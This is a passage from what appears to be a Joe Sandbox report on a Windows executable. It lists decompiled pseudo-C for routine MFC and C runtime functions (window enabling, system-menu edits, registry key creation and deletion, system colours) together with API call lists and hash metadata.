                  							if(_t39 != 0 && E0040E23A(_t57, _t58, 0, _t71, _t80, _t71) != 0 && E004156A7( *((intOrPtr*)( *((intOrPtr*)(_t73 - 0x10)) + 0x20)), _t71) != 0 && SendMessageW(_t71, 0x36c, 0, 0) == 0) {
                  								EnableWindow(_t71, 0);
                  								_t58 = _t73 - 0x24;
                  								E004174AA(_t73 - 0x24, _t71);
                  							}
                  							_t71 = GetWindow(_t71, 2);
                  						} while (_t71 != 0);
                  						_t72 =  *(_t73 - 0x1c);
                  						if(_t72 != 0) {
                  							_t87 = _t72 > 0;
                  							if(_t72 > 0) {
                  								goto L2;
                  							} else {
                  								_t66 = 4;
                  								_t46 = E0040B71F(_t87,  ~(0 | _t87 > 0x00000000) | (_t72 + 0x00000001) * _t66);
                  								_t58 = _t72 << 2;
                  								 *((intOrPtr*)(_t57 + 0xbc)) = _t46;
                  								 *((intOrPtr*)((_t72 << 2) + _t46)) = 0;
                  								if((0 |  *((intOrPtr*)(_t73 - 0x20)) != 0x00000000) == 0) {
                  									goto L2;
                  								} else {
                  									E00402850(_t57,  *((intOrPtr*)(_t57 + 0xbc)), _t58,  *((intOrPtr*)(_t73 - 0x20)), _t58);
                  								}
                  							}
                  						}
                  					}
                  					 *(_t73 - 4) =  *(_t73 - 4) | 0xffffffff;
                  					_t34 = E004174C3(_t73 - 0x24);
                  				}
                  				return E00429303(_t34);
                  			}













                  APIs
                  • __EH_prolog3.LIBCMT ref: 00417823
                  • GetDesktopWindow.USER32 ref: 00417866
                  • GetWindow.USER32(00000000), ref: 0041786D
                  • IsWindowEnabled.USER32(00000000), ref: 0041787E
                  • SendMessageW.USER32(00000000,0000036C,00000000,00000000), ref: 004178AA
                  • EnableWindow.USER32(00000000,00000000), ref: 004178B6
                  • GetWindow.USER32(00000000,00000002), ref: 004178C8
                    • Part of subcall function 00413DD0: __CxxThrowException@8.LIBCMT ref: 00413DE6
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Window$DesktopEnableEnabledException@8H_prolog3MessageSendThrow
                  • String ID:
                  • API String ID: 1477819144-0
                  • Opcode ID: 71f509dec0510cd0098a64a0cf31119a85f09f9ce080e88fcddbeb1881772901
                  • Instruction ID: 3c561aa6ef1dac1b767ae155073595786efb4d68b8742618b787af31e675a132
                  • Opcode Fuzzy Hash: 71f509dec0510cd0098a64a0cf31119a85f09f9ce080e88fcddbeb1881772901
                  • Instruction Fuzzy Hash: C131D7719402109FDB21BF75CC4D9EFBAB8AF44310F24452EE456EB291DB784D40CB69
                  Uniqueness

                  Uniqueness Score: 1.28%

                  C-Code - Quality: 83%
                  			E0041C8CC(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                  				void* _t31;
                  				intOrPtr _t51;
                  				void* _t63;
                  				signed int _t71;
                  				void* _t73;
                  
                  				_t53 = __ecx;
                  				_push(4);
                  				E0042922B(E004391F9, __ebx, __edi, __esi);
                  				_t51 = __ecx;
                  				 *((intOrPtr*)(_t73 - 0x10)) = __ecx;
                  				 *((intOrPtr*)(__ecx + 0xc8)) = 1;
                  				_t31 = 0x80c83b00;
                  				if(( *(_t73 + 0xc) & 0x00000004) != 0) {
                  					_t31 = 0x80c83300;
                  				}
                  				if(E004247BF(_t53, 0, 0, 0x43de78, _t31, 0x44be84,  *((intOrPtr*)(_t73 + 8)), 0) != 0) {
                  					asm("sbb esi, esi");
                  					_t71 = ( ~( *(_t73 + 0xc) & 0x00005000) & 0xfffff000) + 0x00002000 |  *(_t73 + 0xc) & 0x00000040;
                  					_t63 = E0041B5B7(_t51, 0);
                  					if(_t63 != 0) {
                  						DeleteMenu( *(_t63 + 4), 0xf000, 0);
                  						DeleteMenu( *(_t63 + 4), 0xf020, 0);
                  						DeleteMenu( *(_t63 + 4), 0xf030, 0);
                  						DeleteMenu( *(_t63 + 4), 0xf120, 0);
                  						E00404820(_t73 + 0xc);
                  						 *(_t73 - 4) =  *(_t73 - 4) & 0x00000000;
                  						if(E00404D40(_t73 + 0xc, 0xf011) != 0) {
                  							DeleteMenu( *(_t63 + 4), 0xf060, 0);
                  							AppendMenuW( *(_t63 + 4), 0, 0xf060,  *(_t73 + 0xc));
                  						}
                  						 *(_t73 - 4) =  *(_t73 - 4) | 0xffffffff;
                  						E004055F0( &(( *(_t73 + 0xc))[0xfffffffffffffff8]));
                  						_t51 =  *((intOrPtr*)(_t73 - 0x10));
                  					}
                  					_push(0xe81f);
                  					_push(_t71 | 0x50000000);
                  					_push( *((intOrPtr*)(_t73 + 8)));
                  					_t64 = _t51 + 0xf8;
                  					if( *((intOrPtr*)( *((intOrPtr*)(_t51 + 0xf8)) + 0x17c))() != 0) {
                  						E0041B5D2(_t64, _t51);
                  					}
                  					 *(_t51 + 0xc8) =  *(_t51 + 0xc8) & 0x00000000;
                  					goto L4;
                  				} else {
                  					 *(_t51 + 0xc8) = 0;
                  					L4:
                  					return E00429303(1);
                  				}
                  			}









                  APIs
                  • __EH_prolog3.LIBCMT ref: 0041C8D3
                    • Part of subcall function 0041B5B7: GetSystemMenu.USER32(?,?), ref: 0041B5C2
                  • DeleteMenu.USER32(?,0000F000,00000000), ref: 0041C963
                  • DeleteMenu.USER32(?,0000F020,00000000), ref: 0041C96F
                  • DeleteMenu.USER32(?,0000F030,00000000), ref: 0041C97B
                  • DeleteMenu.USER32(?,0000F120,00000000), ref: 0041C987
                  • DeleteMenu.USER32(?,0000F060,00000000), ref: 0041C9B0
                  • AppendMenuW.USER32(?,00000000,0000F060,00000004), ref: 0041C9BF
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Menu$Delete$AppendH_prolog3System
                  • String ID:
                  • API String ID: 1427010815-0
                  • Opcode ID: b15e1293bd0b583bb0ea560288b2b9202c1115779221f7cab6f86a85f071c67f
                  • Instruction ID: 166b7f312bf8a115184cc9866f58422f5143140c667db65bb4f99035435a30f4
                  • Opcode Fuzzy Hash: b15e1293bd0b583bb0ea560288b2b9202c1115779221f7cab6f86a85f071c67f
                  • Instruction Fuzzy Hash: A231F571680605BBEB209F60CC86FB97661EF44758F148239FE196E2D2CB78AD10D74C
                  Uniqueness

                  Uniqueness Score: 100.00%

                  APIs
                  • _DebugHeapAllocator.LIBCPMTD ref: 00401E56
                    • Part of subcall function 004049A0: _DebugHeapAllocator.LIBCPMTD ref: 004049AE
                  • _DebugHeapAllocator.LIBCPMTD ref: 00401E6F
                  • _DebugHeapAllocator.LIBCPMTD ref: 00401E80
                  • _DebugHeapAllocator.LIBCPMTD ref: 00401E8D
                  • _DebugHeapAllocator.LIBCPMTD ref: 00401EAB
                  • _DebugHeapAllocator.LIBCPMTD ref: 00401EE3
                  • _DebugHeapAllocator.LIBCPMTD ref: 00401EF4
                  • _DebugHeapAllocator.LIBCPMTD ref: 00401F17
                  • _DebugHeapAllocator.LIBCPMTD ref: 00401F30
                  • _DebugHeapAllocator.LIBCPMTD ref: 00401F49
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: AllocatorDebugHeap
                  • String ID:
                  • API String ID: 571936431-0
                  • Opcode ID: e145b664f4ec2858145dce37ae61712d6b79074153d8035d9a467f5c37a10308
                  • Instruction ID: 38d59267fced033494c664b5997d8aa3662d955827d08b83a0b8d19548b0edde
                  • Opcode Fuzzy Hash: e145b664f4ec2858145dce37ae61712d6b79074153d8035d9a467f5c37a10308
                  • Instruction Fuzzy Hash: D0310EB19101199BCB08EBA5DC529FFB775BF94308F50402EE242771D2DE3C6A14CBA9
                  Uniqueness

                  Uniqueness Score: 4.01%

                  C-Code - Quality: 88%
                  			E0041DE3E(signed int __ebx, void* __edi, void* __esi, void* __eflags) {
                  				long _t38;
                  				void* _t51;
                  				void* _t54;
                  				signed int _t57;
                  				void* _t70;
                  				void* _t72;
                  				void* _t75;
                  
                  				_t75 = __eflags;
                  				_t57 = __ebx;
                  				_push(0x228);
                  				E004292CA(E004392EC, __ebx, __edi, __esi);
                  				_t70 =  *(_t72 + 8);
                  				 *(_t72 - 0x230) = _t70;
                  				E00405590(_t72 - 0x228, _t75,  *((intOrPtr*)(_t72 + 0xc)));
                  				 *((intOrPtr*)(_t72 - 4)) = 0;
                  				if(_t70 == 0x80000000) {
                  					_t51 = E00420117();
                  					_t77 = _t51 - 1;
                  					if(_t51 == 1) {
                  						_push(_t72 - 0x228);
                  						_push(L"Software\\Classes\\");
                  						_push(_t72 - 0x224);
                  						_t54 = E0041DDE9(__ebx, 0, _t70, _t77);
                  						 *((char*)(_t72 - 4)) = 1;
                  						E00405630(_t72 - 0x228, _t77, _t54);
                  						 *((char*)(_t72 - 4)) = 0;
                  						E004055F0( *((intOrPtr*)(_t72 - 0x224)) + 0xfffffff0);
                  						 *(_t72 - 0x230) = 0x80000001;
                  					}
                  				}
                  				_t38 = RegOpenKeyW( *(_t72 - 0x230),  *(_t72 - 0x228), _t72 - 0x22c);
                  				_t71 = _t38;
                  				if(_t38 != 0) {
                  					L11:
                  					__eflags =  &(( *(_t72 - 0x228))[0xfffffffffffffff8]);
                  					E004055F0( &(( *(_t72 - 0x228))[0xfffffffffffffff8]));
                  					return E00429326(_t57, 0, _t71);
                  				} else {
                  					while(1) {
                  						_t71 = RegEnumKeyW( *(_t72 - 0x22c), 0, _t72 - 0x220, 0x104);
                  						_t80 = _t71;
                  						if(_t71 != 0) {
                  							break;
                  						}
                  						_push(_t72 - 0x220);
                  						 *((char*)(_t72 - 4)) = 2;
                  						E00410F00(_t57, _t72 - 0x224, 0, _t71, _t80);
                  						 *((char*)(_t72 - 4)) = 3;
                  						_t71 = E0041DE3E(_t57, 0, _t71, _t80,  *(_t72 - 0x22c), _t72 - 0x224);
                  						_t57 = _t57 & 0xffffff00 | _t71 != 0x00000000;
                  						 *((char*)(_t72 - 4)) = 2;
                  						E004055F0( *((intOrPtr*)(_t72 - 0x224)) + 0xfffffff0);
                  						if(_t57 != 0) {
                  							break;
                  						}
                  						 *((intOrPtr*)(_t72 - 4)) = 0;
                  					}
                  					__eflags = _t71 - 0x103;
                  					if(_t71 == 0x103) {
                  						L9:
                  						_t71 = RegDeleteKeyW( *(_t72 - 0x230),  *(_t72 - 0x228));
                  						L10:
                  						RegCloseKey( *(_t72 - 0x22c));
                  						goto L11;
                  					}
                  					__eflags = _t71 - 0x3f2;
                  					if(_t71 != 0x3f2) {
                  						goto L10;
                  					}
                  					goto L9;
                  				}
                  			}











                  APIs
                  • __EH_prolog3_catch_GS.LIBCMT ref: 0041DE48
                  • RegOpenKeyW.ADVAPI32(?,?,?), ref: 0041DED6
                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000104), ref: 0041DEF9
                    • Part of subcall function 0041DDE9: __EH_prolog3.LIBCMT ref: 0041DDF0
                    • Part of subcall function 0041DDE9: _DebugHeapAllocator.LIBCPMTD ref: 0041DE07
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: AllocatorDebugEnumH_prolog3H_prolog3_catch_HeapOpen
                  • String ID: Software\Classes\
                  • API String ID: 751309350-1121929649
                  • Opcode ID: 2c6e8effad27e3013cf491f35a6007a38afd1bf70f0ac5b35f02769d1177a11c
                  • Instruction ID: 4ba86f8b9ab8953ea9b5b47a85a972cb9b2501afc94746916ee130f1a5d2ab51
                  • Opcode Fuzzy Hash: 2c6e8effad27e3013cf491f35a6007a38afd1bf70f0ac5b35f02769d1177a11c
                  • Instruction Fuzzy Hash: 2E316171C00128AACB21EBA4DD48BEEB7B4EF18314F1402EAE95963291DB384FC4DF55
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 95%
                  			E00417945(intOrPtr* __ecx, long _a4) {
                  				void* __ebx;
                  				void* _t26;
                  				signed int _t27;
                  				long _t40;
                  				signed int _t43;
                  				intOrPtr* _t54;
                  
                  				_t47 = __ecx;
                  				_t43 = _a4;
                  				_t54 = __ecx;
                  				if(_t43 != 0 && ( *(__ecx + 0x3c) & 0x00000004) != 0) {
                  					E00411E6E(__ecx, 0);
                  					return SetFocus(0);
                  				}
                  				_t26 = E0040E20E(_t43, _t47, GetParent( *(_t54 + 0x20)));
                  				if(_t26 == 0) {
                  					L5:
                  					if(_t43 != 0) {
                  						_t27 =  *(_t54 + 0x3c);
                  						if(_t27 < 0) {
                  							 *(_t54 + 0x3c) = _t27 & 0xffffff7f;
                  							 *((intOrPtr*)( *_t54 + 0x104))();
                  							_a4 =  *(_t54 + 0x20);
                  							if(GetActiveWindow() == _a4) {
                  								SendMessageW(_a4, 6, 1, 0);
                  							}
                  						}
                  						if(( *(_t54 + 0x3c) & 0x00000020) != 0) {
                  							SendMessageW( *(_t54 + 0x20), 0x86, 1, 0);
                  						}
                  					} else {
                  						if( *((intOrPtr*)(_t54 + 0xb8)) == 0) {
                  							 *(_t54 + 0x3c) =  *(_t54 + 0x3c) | 0x00000080;
                  							 *((intOrPtr*)( *_t54 + 0x100))();
                  						}
                  					}
                  					asm("sbb ebx, ebx");
                  					return E00416080(_t54, ( ~_t43 & 0xfffffff0) + 0x20);
                  				} else {
                  					_a4 = 0;
                  					GetWindowThreadProcessId( *(_t26 + 0x20),  &_a4);
                  					_t40 = GetCurrentProcessId();
                  					if(_t40 == _a4) {
                  						return _t40;
                  					}
                  					goto L5;
                  				}
                  			}










                  APIs
                  • SetFocus.USER32(00000000), ref: 00417965
                  • GetParent.USER32(?), ref: 00417973
                  • GetWindowThreadProcessId.USER32(?,?), ref: 0041798E
                  • GetCurrentProcessId.KERNEL32 ref: 00417994
                  • GetActiveWindow.USER32 ref: 004179E7
                  • SendMessageW.USER32(?,00000006,00000001,00000000), ref: 004179FB
                  • SendMessageW.USER32(?,00000086,00000001,00000000), ref: 00417A0F
                    • Part of subcall function 00411E6E: EnableWindow.USER32(?,004089A8), ref: 00411E7F
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Window$MessageProcessSend$ActiveCurrentEnableFocusParentThread
                  • String ID:
                  • API String ID: 2169720751-0
                  • Opcode ID: 88780be8c65a5834ad4b064e61823059d67935aa198ae239829dba557eeb9c58
                  • Instruction ID: 6334339bbabaa346ef34ed15cd65935d7a3aa1158bc58f598a8bac2caa3b2a90
                  • Opcode Fuzzy Hash: 88780be8c65a5834ad4b064e61823059d67935aa198ae239829dba557eeb9c58
                  • Instruction Fuzzy Hash: 8521F171254600AFDB219F24DCC8B9E7BF5BF44390F14452AF98A872A0C7B9B880CB49
                  Uniqueness

                  Uniqueness Score: 0.83%

                  C-Code - Quality: 100%
                  			E0041E362(intOrPtr __ecx) {
                  				void* _v8;
                  				void* _v12;
                  				void* _v16;
                  				int _v20;
                  				intOrPtr _v24;
                  				intOrPtr _t32;
                  
                  				_t32 = __ecx;
                  				_v24 = __ecx;
                  				_v16 = 0;
                  				_v8 = 0;
                  				_v12 = 0;
                  				if(RegOpenKeyExW(0x80000001, L"software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExW(_v8,  *(_t32 + 0x54), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
                  					RegCreateKeyExW(_v12,  *(_v24 + 0x68), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
                  				}
                  				if(_v8 != 0) {
                  					RegCloseKey(_v8);
                  				}
                  				if(_v12 != 0) {
                  					RegCloseKey(_v12);
                  				}
                  				return _v16;
                  			}










                  APIs
                  • RegOpenKeyExW.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 0041E392
                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 0041E3B5
                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 0041E3D1
                  • RegCloseKey.ADVAPI32(?), ref: 0041E3E1
                  • RegCloseKey.ADVAPI32(?), ref: 0041E3EB
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: CloseCreate$Open
                  • String ID: software
                  • API String ID: 1740278721-2010147023
                  • Opcode ID: 20dbba8052fc536820311eea5d21477292677a9297adc920527b435b189b9755
                  • Instruction ID: 7aad1a7528374e95dcce5288ededf23a2c7bc870c9a7114f3ab2e4f52e9d1ad7
                  • Opcode Fuzzy Hash: 20dbba8052fc536820311eea5d21477292677a9297adc920527b435b189b9755
                  • Instruction Fuzzy Hash: 6111E676900118BB8B21DF9ADD88CDFBFBDEB89700B5000AAB914A2121D2759E54DB64
                  Uniqueness

                  Uniqueness Score: 0.22%

                  APIs
                  • GetParent.USER32(?), ref: 0040C365
                  • GetWindowRect.USER32(?,?), ref: 0040C380
                  • ScreenToClient.USER32(?,?), ref: 0040C393
                  • ScreenToClient.USER32(?,?), ref: 0040C39C
                  • EqualRect.USER32(?,?), ref: 0040C3A6
                  • DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000014), ref: 0040C3CE
                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 0040C3D8
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Window$ClientRectScreen$DeferEqualParent
                  • String ID:
                  • API String ID: 443303494-0
                  • Opcode ID: 54e22af4bac11048797fdf47cf58d8ed2c137c2bca7230b1f33007d739ef4bb6
                  • Instruction ID: 9b4bd691bb790c26d1788b8f33ce82ee7038c244376d38ba22e2304d807765cd
                  • Opcode Fuzzy Hash: 54e22af4bac11048797fdf47cf58d8ed2c137c2bca7230b1f33007d739ef4bb6
                  • Instruction Fuzzy Hash: 3A11B272140209EFD710CF64EC88DABBBBDEF88310B10C52ABC56E3254D774A910CB64
                  Uniqueness

                  Uniqueness Score: 0.45%

                  C-Code - Quality: 83%
                  			E0041F3F7(void* __ecx, long* __edi, void* __esi) {
                  				long _t22;
                  				void* _t23;
                  				void* _t28;
                  				void* _t31;
                  				void* _t33;
                  				signed int _t35;
                  				long* _t40;
                  				void* _t41;
                  				void* _t42;
                  
                  				_t41 = __esi;
                  				_t40 = __edi;
                  				_t31 = __ecx;
                  				LeaveCriticalSection( *((intOrPtr*)(_t42 - 0x18)) + 0x1c);
                  				E00428ED5(0, 0);
                  				_t22 = E0041547B(0, _t31, __edi, __esi, 0, __edi[3], 4);
                  				_t33 = 2;
                  				_t23 = LocalReAlloc( *(__esi + 0xc), _t22, ??);
                  				if(_t23 == 0) {
                  					LeaveCriticalSection( *(_t42 - 0x14));
                  					_t23 = E00413D98(_t33);
                  				}
                  				 *(_t41 + 0xc) = _t23;
                  				E004281D0(_t40, _t23 +  *(_t41 + 8) * 4, 0, _t40[3] -  *(_t41 + 8) << 2);
                  				 *(_t41 + 8) = _t40[3];
                  				TlsSetValue( *_t40, _t41);
                  				_t35 =  *(_t42 + 8);
                  				_t28 =  *(_t41 + 0xc);
                  				if(_t28 != 0 && _t35 <  *(_t41 + 8)) {
                  					 *((intOrPtr*)(_t28 + _t35 * 4)) =  *((intOrPtr*)(_t42 + 0xc));
                  				}
                  				_push( *(_t42 - 0x14));
                  				LeaveCriticalSection();
                  				return E00429303(_t28);
                  			}













                  APIs
                  • LeaveCriticalSection.KERNEL32(?), ref: 0041F3FE
                  • __CxxThrowException@8.LIBCMT ref: 0041F408
                    • Part of subcall function 00428ED5: RaiseException.KERNEL32(?,?,?,?), ref: 00428F17
                  • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,0042084C,0040C879,0041196D,?,0040CD7B), ref: 0041F41F
                  • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,0042084C,0040C879,0041196D,?,0040CD7B,?,0040104E,A6E2BCA1), ref: 0041F42C
                    • Part of subcall function 00413D98: __CxxThrowException@8.LIBCMT ref: 00413DAE
                  • _memset.LIBCMT ref: 0041F44B
                  • TlsSetValue.KERNEL32(?,00000000), ref: 0041F45C
                  • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,0042084C,0040C879,0041196D,?,0040CD7B,?,0040104E,A6E2BCA1,?,?,004382C8), ref: 0041F47D
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                  • String ID:
                  • API String ID: 356813703-0
                  • Opcode ID: 683a5929f2ede9cb3d3bd7d006d0d21765b822b8cfd3f88763a399873a874837
                  • Instruction ID: 40b3b10cf9ff2656ac24c0a809c9b7a8796c7dbb78a163cbf26b8e8c3fc3356d
                  • Opcode Fuzzy Hash: 683a5929f2ede9cb3d3bd7d006d0d21765b822b8cfd3f88763a399873a874837
                  • Instruction Fuzzy Hash: CE118B70100605AFDB10EF60DC89D6BBBB9EF10358B50C62EF88696661CB35ACA5CB59
                  Uniqueness

                  Uniqueness Score: 2.04%

                  C-Code - Quality: 89%
                  			E0042F822(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				signed int _t15;
                  				LONG* _t21;
                  				long _t23;
                  				void* _t31;
                  				LONG* _t33;
                  				void* _t34;
                  				void* _t35;
                  
                  				_t35 = __eflags;
                  				_t29 = __edx;
                  				_t25 = __ebx;
                  				_push(0xc);
                  				_push(0x447e68);
                  				E00429338(__ebx, __edi, __esi);
                  				_t31 = E0042C35A(__ebx, __edx, __edi, _t35);
                  				_t15 =  *0x44ccb4; // 0xfffffffe
                  				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                  					E0042EACE(_t25, 0xd);
                  					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                  					_t33 =  *(_t31 + 0x68);
                  					 *(_t34 - 0x1c) = _t33;
                  					__eflags = _t33 -  *0x44cbb8; // 0x512728
                  					if(__eflags != 0) {
                  						__eflags = _t33;
                  						if(_t33 != 0) {
                  							_t23 = InterlockedDecrement(_t33);
                  							__eflags = _t23;
                  							if(_t23 == 0) {
                  								__eflags = _t33 - 0x44c790;
                  								if(__eflags != 0) {
                  									_push(_t33);
                  									E00428397(_t25, _t31, _t33, __eflags);
                  								}
                  							}
                  						}
                  						_t21 =  *0x44cbb8; // 0x512728
                  						 *(_t31 + 0x68) = _t21;
                  						_t33 =  *0x44cbb8; // 0x512728
                  						 *(_t34 - 0x1c) = _t33;
                  						InterlockedIncrement(_t33);
                  					}
                  					 *(_t34 - 4) = 0xfffffffe;
                  					E0042F8BD();
                  				} else {
                  					_t33 =  *(_t31 + 0x68);
                  				}
                  				if(_t33 == 0) {
                  					E0042AEA5(_t29, _t31, 0x20);
                  				}
                  				return E0042937D(_t33);
                  			}











                  APIs
                  • __getptd.LIBCMT ref: 0042F82E
                    • Part of subcall function 0042C35A: __getptd_noexit.LIBCMT ref: 0042C35D
                    • Part of subcall function 0042C35A: __amsg_exit.LIBCMT ref: 0042C36A
                  • __amsg_exit.LIBCMT ref: 0042F84E
                  • __lock.LIBCMT ref: 0042F85E
                  • InterlockedDecrement.KERNEL32(?), ref: 0042F87B
                  • InterlockedIncrement.KERNEL32(00512728), ref: 0042F8A6
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                  • String ID: ('Q
                  • API String ID: 4271482742-263593293
                  • Opcode ID: 34075ac56374c43f1a66d9d85007a1a8ffba65dbe93c673ac4ccf358b97abe10
                  • Instruction ID: 3e858a921384195d2288191ab6d460c054479cb6a7e3aaef8eace4b66df5302f
                  • Opcode Fuzzy Hash: 34075ac56374c43f1a66d9d85007a1a8ffba65dbe93c673ac4ccf358b97abe10
                  • Instruction Fuzzy Hash: E2018E32B01631ABDB50BB65B84675EB370AF05714FC9407BE814A3781D72C6945CBDE
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 100%
                  			E00421525(void* __ecx) {
                  				struct HBRUSH__* _t14;
                  				void* _t18;
                  
                  				_t18 = __ecx;
                  				 *((intOrPtr*)(_t18 + 0x28)) = GetSysColor(0xf);
                  				 *((intOrPtr*)(_t18 + 0x2c)) = GetSysColor(0x10);
                  				 *((intOrPtr*)(_t18 + 0x30)) = GetSysColor(0x14);
                  				 *((intOrPtr*)(_t18 + 0x34)) = GetSysColor(0x12);
                  				 *((intOrPtr*)(_t18 + 0x38)) = GetSysColor(6);
                  				 *((intOrPtr*)(_t18 + 0x24)) = GetSysColorBrush(0xf);
                  				_t14 = GetSysColorBrush(6);
                  				 *(_t18 + 0x20) = _t14;
                  				return _t14;
                  			}






                  APIs
                  • GetSysColor.USER32(0000000F), ref: 00421533
                  • GetSysColor.USER32(00000010), ref: 0042153A
                  • GetSysColor.USER32(00000014), ref: 00421541
                  • GetSysColor.USER32(00000012), ref: 00421548
                  • GetSysColor.USER32(00000006), ref: 0042154F
                  • GetSysColorBrush.USER32(0000000F), ref: 0042155C
